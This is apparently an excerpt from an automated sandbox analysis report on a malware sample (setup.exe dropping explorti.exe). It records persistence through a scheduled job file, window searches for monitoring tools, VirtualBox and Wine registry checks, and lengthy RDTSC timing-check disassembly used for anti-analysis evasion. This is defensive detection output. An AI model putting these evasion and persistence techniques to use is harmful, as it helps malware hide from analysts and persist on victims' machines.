Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8EFBC second address: C8E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CDD6578h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CDD6567h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CDD6579h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CDD656Ch 0x00000081 jp 00007FF32CDD6566h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: C8E7EC second address: C8E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CFB71F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DE9D49 second address: DE9D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CDD6575h 0x0000000a jl 00007FF32CDD6566h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EAE second address: E05EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05EB2 second address: E05F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6576h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CDD6578h 0x00000011 jmp 00007FF32CDD6579h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F02 second address: E05F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E05F07 second address: E05F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E06060 second address: E0609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CFB71F6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CFB71F6h 0x0000001f popad 0x00000020 jmp 00007FF32CFB7205h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E061D3 second address: E061E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CDD6566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08DBA second address: E08E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CFB71F9h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CFB71F8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CFB71FCh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E34 second address: E08E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E38 second address: E08E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 53A7649Bh 0x00000011 jmp 00007FF32CFB7202h 0x00000016 lea ebx, dword ptr [ebp+1244DC23h] 0x0000001c mov dword ptr [ebp+122D26E7h], edx 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7A second address: E08E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08E7E second address: E08E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08EE9 second address: E08F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D19B0h], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 xor dword ptr [ebp+122D2EE4h], esi 0x00000018 pop edx 0x00000019 push 47E2DAD0h 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FF32CDD656Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E08F15 second address: E08F8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 47E2DA50h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF32CFB71F8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007FF32CFB7208h 0x0000002e push 00000003h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 call 00007FF32CFB71FAh 0x00000038 and esi, dword ptr [ebp+122D362Ch] 0x0000003e pop edx 0x0000003f push 00000003h 0x00000041 and edx, dword ptr [ebp+122D1B16h] 0x00000047 push A898F41Fh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CFB71FAh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E0904C second address: E090D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1960h], edx 0x00000013 push 00000000h 0x00000015 mov di, cx 0x00000018 push 4FE6D845h 0x0000001d jmp 00007FF32CDD656Bh 0x00000022 xor dword ptr [esp], 4FE6D8C5h 0x00000029 mov dl, 99h 0x0000002b push 00000003h 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D1C03h], eax 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 sbb cx, BB00h 0x0000003c push 00000003h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007FF32CDD6568h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 mov si, 882Dh 0x0000005c push D27FA0DCh 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E090D2 second address: E090D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A523 second address: E2A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A69F second address: E2A6A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A7EB second address: E2A800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FF32CDD6566h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A800 second address: E2A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A804 second address: E2A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A811 second address: E2A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A819 second address: E2A835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6575h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2A835 second address: E2A842 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AAEC second address: E2AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2ADFF second address: E2AE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2AF88 second address: E2AF92 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B108 second address: E2B119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FF32CFB71F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B253 second address: E2B259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B259 second address: E2B262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B262 second address: E2B268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B268 second address: E2B270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B270 second address: E2B27C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B27C second address: E2B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B280 second address: E2B292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3EE second address: E2B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B3F9 second address: E2B41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 js 00007FF32CDD6572h 0x00000016 jl 00007FF32CDD656Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5AC second address: E2B5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2B5B2 second address: E2B5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E1FA6C second address: E1FA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC67 second address: E2BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC6B second address: E2BC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF32CFB71FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC85 second address: E2BC98 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c ja 00007FF32CDD6566h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BC98 second address: E2BCA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF90 second address: E2BF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2BF94 second address: E2BFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7205h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F0 second address: E2C0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2C0F6 second address: E2C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBC9 second address: E2DBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBCD second address: E2DBF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB71FCh 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF32CFB71FDh 0x00000013 pop edx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DBF6 second address: E2DC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC03 second address: E2DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2DC09 second address: E2DC0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC1 second address: E30CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E30CC5 second address: E30CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F679 second address: E2F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F67E second address: E2F684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E2F684 second address: E2F688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E31055 second address: E3105B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E34166 second address: E3416A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37A5B second address: E37A98 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FF32CDD6566h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FF32CDD6577h 0x00000014 jmp 00007FF32CDD656Fh 0x00000019 js 00007FF32CDD656Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DCD second address: E37DD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DD1 second address: E37DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE1 second address: E37DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E37DE7 second address: E37DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E380C3 second address: E380C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3838D second address: E38391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E38391 second address: E3839F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C32 second address: E39C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C38 second address: E39C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C3C second address: E39C4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E39C4A second address: E39C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C698 second address: E3C69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C69E second address: E3C6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3C6A2 second address: E3C6B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF32CDD6566h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
